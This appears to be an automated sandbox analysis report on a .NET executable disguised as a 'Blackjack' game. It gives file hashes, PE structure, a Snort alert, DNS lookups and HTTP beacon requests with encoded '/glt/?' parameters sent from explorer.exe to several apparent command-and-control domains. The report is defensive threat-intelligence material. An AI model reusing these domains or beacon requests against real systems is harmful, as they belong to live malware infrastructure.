                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:vOKMFxiCYt.exe
                                                    File size:711168
                                                    MD5:bb30a5dd4130b071fb4ca5f005371c63
                                                    SHA1:52c3ca02828a4ad8e8dbf790a61b3d77379ad391
                                                    SHA256:4c73fd4286e76a094eefafe5369f3a184ca4a38d567ae6dfad61645bf968a83f
                                                    SHA512:062f184dea6b1327418b7030b114cc40bf21072408fb9408bc18b823bce73534cf513a566ef16f90c0379581fb9e189d8d39614334c04c1607afbc02089ac0d1
                                                    SSDEEP:12288:8uuG4MYHtSghDUtXrVNRk6ivKdKPWD4axof2YwhOT6lt6CjC2rPTVeOywSXvAfC:bjYMghDOXrK64KdIw4aVD82
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'._..............P.............n.... ........@.. ....................... ............@................................

                                                    File Icon

                                                    Icon Hash:68f4d4f0f0f0d8c4

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4ad96e
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x5FB627B3 [Thu Nov 19 08:07:15 2020 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xad91c0x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x1a20.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000xab9740xaba00False0.796825211672data7.62841280925IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xae0000x1a200x1c00False0.759068080357data6.77634039509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xb00000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_ICON0xae1300x13dePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                    RT_GROUP_ICON0xaf5100x14data
                                                    RT_VERSION0xaf5240x30cdata
                                                    RT_MANIFEST0xaf8300x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    LegalCopyrightCopyright 2014
                                                    Assembly Version1.0.0.0
                                                    InternalNameLqei.exe
                                                    FileVersion1.0.0.0
                                                    CompanyName
                                                    LegalTrademarks
                                                    Comments
                                                    ProductNameBlackjack
                                                    ProductVersion1.0.0.0
                                                    FileDescriptionBlackjack
                                                    OriginalFilenameLqei.exe

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    11/20/20-20:05:47.333897TCP1201ATTACK-RESPONSES 403 Forbidden804973734.102.136.180192.168.2.3

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 20, 2020 20:05:26.573868990 CET4972880192.168.2.33.138.72.189
                                                    Nov 20, 2020 20:05:26.686641932 CET80497283.138.72.189192.168.2.3
                                                    Nov 20, 2020 20:05:26.686763048 CET4972880192.168.2.33.138.72.189
                                                    Nov 20, 2020 20:05:26.687122107 CET4972880192.168.2.33.138.72.189
                                                    Nov 20, 2020 20:05:26.799868107 CET80497283.138.72.189192.168.2.3
                                                    Nov 20, 2020 20:05:26.800371885 CET80497283.138.72.189192.168.2.3
                                                    Nov 20, 2020 20:05:26.800390959 CET80497283.138.72.189192.168.2.3
                                                    Nov 20, 2020 20:05:26.800730944 CET4972880192.168.2.33.138.72.189
                                                    Nov 20, 2020 20:05:26.800884962 CET4972880192.168.2.33.138.72.189
                                                    Nov 20, 2020 20:05:26.913804054 CET80497283.138.72.189192.168.2.3
                                                    Nov 20, 2020 20:05:47.201289892 CET4973780192.168.2.334.102.136.180
                                                    Nov 20, 2020 20:05:47.217951059 CET804973734.102.136.180192.168.2.3
                                                    Nov 20, 2020 20:05:47.218205929 CET4973780192.168.2.334.102.136.180
                                                    Nov 20, 2020 20:05:47.218628883 CET4973780192.168.2.334.102.136.180
                                                    Nov 20, 2020 20:05:47.235160112 CET804973734.102.136.180192.168.2.3
                                                    Nov 20, 2020 20:05:47.333897114 CET804973734.102.136.180192.168.2.3
                                                    Nov 20, 2020 20:05:47.333945990 CET804973734.102.136.180192.168.2.3
                                                    Nov 20, 2020 20:05:47.334137917 CET4973780192.168.2.334.102.136.180
                                                    Nov 20, 2020 20:05:47.334182978 CET4973780192.168.2.334.102.136.180
                                                    Nov 20, 2020 20:05:47.350737095 CET804973734.102.136.180192.168.2.3
                                                    Nov 20, 2020 20:06:07.638340950 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.740331888 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.740473032 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.740803957 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.842596054 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845019102 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845062017 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845097065 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845140934 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845160007 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.845180035 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845208883 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.845216036 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845251083 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845271111 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.845287085 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845320940 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845355988 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845359087 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.845417023 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947180033 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947225094 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947264910 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947304964 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947346926 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947355986 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947400093 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947413921 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947438002 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947479963 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947495937 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947539091 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947577000 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947582960 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947617054 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947632074 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947655916 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947694063 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947731972 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947767973 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947770119 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947818995 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947850943 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947861910 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947900057 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947900057 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947940111 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947969913 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947978973 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.948054075 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.049653053 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049686909 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049711943 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049737930 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049762011 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049788952 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049796104 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.049814939 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049840927 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049865007 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049890041 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049913883 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049937010 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049961090 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049987078 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049988985 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.050012112 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050035000 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050057888 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050080061 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050084114 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.050103903 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050144911 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050153017 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.050172091 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050195932 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050219059 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050241947 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050255060 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.050273895 CET8049739198.49.23.141192.168.2.3

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 20, 2020 20:04:27.174336910 CET4919953192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:27.201273918 CET53491998.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:28.409771919 CET5062053192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:28.445518970 CET53506208.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:29.263453007 CET6493853192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:29.299217939 CET53649388.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:30.287308931 CET6015253192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:30.323168039 CET53601528.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:31.344918013 CET5754453192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:31.371900082 CET53575448.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:32.375833035 CET5598453192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:32.411385059 CET53559848.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:33.312665939 CET6418553192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:33.339875937 CET53641858.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:34.131174088 CET6511053192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:34.166830063 CET53651108.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:37.789849997 CET5836153192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:37.816962004 CET53583618.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:42.357013941 CET6349253192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:42.384237051 CET53634928.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:42.432178974 CET6083153192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:42.467820883 CET53608318.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:45.847429037 CET6010053192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:45.874659061 CET53601008.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:46.653862953 CET5319553192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:46.689718008 CET53531958.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:47.502192020 CET5014153192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:47.529350042 CET53501418.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:48.451488972 CET5302353192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:48.478710890 CET53530238.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:49.907897949 CET4956353192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:49.935122967 CET53495638.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:50.950056076 CET5135253192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:50.985755920 CET53513528.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:51.852180004 CET5934953192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:51.879240990 CET53593498.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:52.744124889 CET5708453192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:52.771322966 CET53570848.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:54.259608984 CET5882353192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:54.286655903 CET53588238.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:55.150151014 CET5756853192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:55.177166939 CET53575688.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:56.516977072 CET5054053192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:56.544198036 CET53505408.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:05:13.104862928 CET5436653192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:05:13.131953001 CET53543668.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:05:13.430130005 CET5303453192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:05:13.457263947 CET53530348.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:05:26.419954062 CET5776253192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:05:26.563220978 CET53577628.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:05:30.900866032 CET5543553192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:05:30.927938938 CET53554358.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:05:36.146415949 CET5071353192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:05:36.184793949 CET53507138.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:05:47.008040905 CET5613253192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:05:47.198796034 CET53561328.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:06:06.429137945 CET5898753192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:06:06.456185102 CET53589878.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:06:07.502074003 CET5657953192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:06:07.637175083 CET53565798.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:06:07.774087906 CET6063353192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:06:07.801172018 CET53606338.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:06:28.238503933 CET6129253192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:06:28.276519060 CET53612928.8.8.8192.168.2.3

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Nov 20, 2020 20:05:26.419954062 CET192.168.2.38.8.8.80x1b37Standard query (0)www.tessuto.netA (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:05:47.008040905 CET192.168.2.38.8.8.80x6e50Standard query (0)www.reem.proA (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:06:07.502074003 CET192.168.2.38.8.8.80x8650Standard query (0)www.themaskedstitcher.comA (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:06:28.238503933 CET192.168.2.38.8.8.80xd8eStandard query (0)www.auctionpros.clubA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Nov 20, 2020 20:05:26.563220978 CET8.8.8.8192.168.2.30x1b37No error (0)www.tessuto.netprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                    Nov 20, 2020 20:05:26.563220978 CET8.8.8.8192.168.2.30x1b37No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.138.72.189A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:05:26.563220978 CET8.8.8.8192.168.2.30x1b37No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.202.18A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:05:26.563220978 CET8.8.8.8192.168.2.30x1b37No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.134.22.63A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:05:47.198796034 CET8.8.8.8192.168.2.30x6e50No error (0)www.reem.proreem.proCNAME (Canonical name)IN (0x0001)
                                                    Nov 20, 2020 20:05:47.198796034 CET8.8.8.8192.168.2.30x6e50No error (0)reem.pro34.102.136.180A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:06:07.637175083 CET8.8.8.8192.168.2.30x8650No error (0)www.themaskedstitcher.comext-cust.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                    Nov 20, 2020 20:06:07.637175083 CET8.8.8.8192.168.2.30x8650No error (0)ext-cust.squarespace.com198.49.23.141A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:06:07.637175083 CET8.8.8.8192.168.2.30x8650No error (0)ext-cust.squarespace.com198.185.159.141A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:06:07.637175083 CET8.8.8.8192.168.2.30x8650No error (0)ext-cust.squarespace.com198.49.23.141A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:06:07.637175083 CET8.8.8.8192.168.2.30x8650No error (0)ext-cust.squarespace.com198.185.159.141A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:06:28.276519060 CET8.8.8.8192.168.2.30xd8eNo error (0)www.auctionpros.clubauctionpros.clubCNAME (Canonical name)IN (0x0001)
                                                    Nov 20, 2020 20:06:28.276519060 CET8.8.8.8192.168.2.30xd8eNo error (0)auctionpros.club162.0.232.118A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.tessuto.net
                                                    • www.reem.pro
                                                    • www.themaskedstitcher.com
                                                    • www.auctionpros.club

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.3497283.138.72.18980C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Nov 20, 2020 20:05:26.687122107 CET657OUTGET /glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4 HTTP/1.1
                                                    Host: www.tessuto.net
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Nov 20, 2020 20:05:26.800371885 CET658INHTTP/1.1 404 Not Found
                                                    Date: Fri, 20 Nov 2020 19:05:26 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 153
                                                    Connection: close
                                                    Server: nginx/1.16.1
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.34973734.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Nov 20, 2020 20:05:47.218628883 CET5031OUTGET /glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh HTTP/1.1
                                                    Host: www.reem.pro
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Nov 20, 2020 20:05:47.333897114 CET5032INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Fri, 20 Nov 2020 19:05:47 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "5fb7c9ca-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
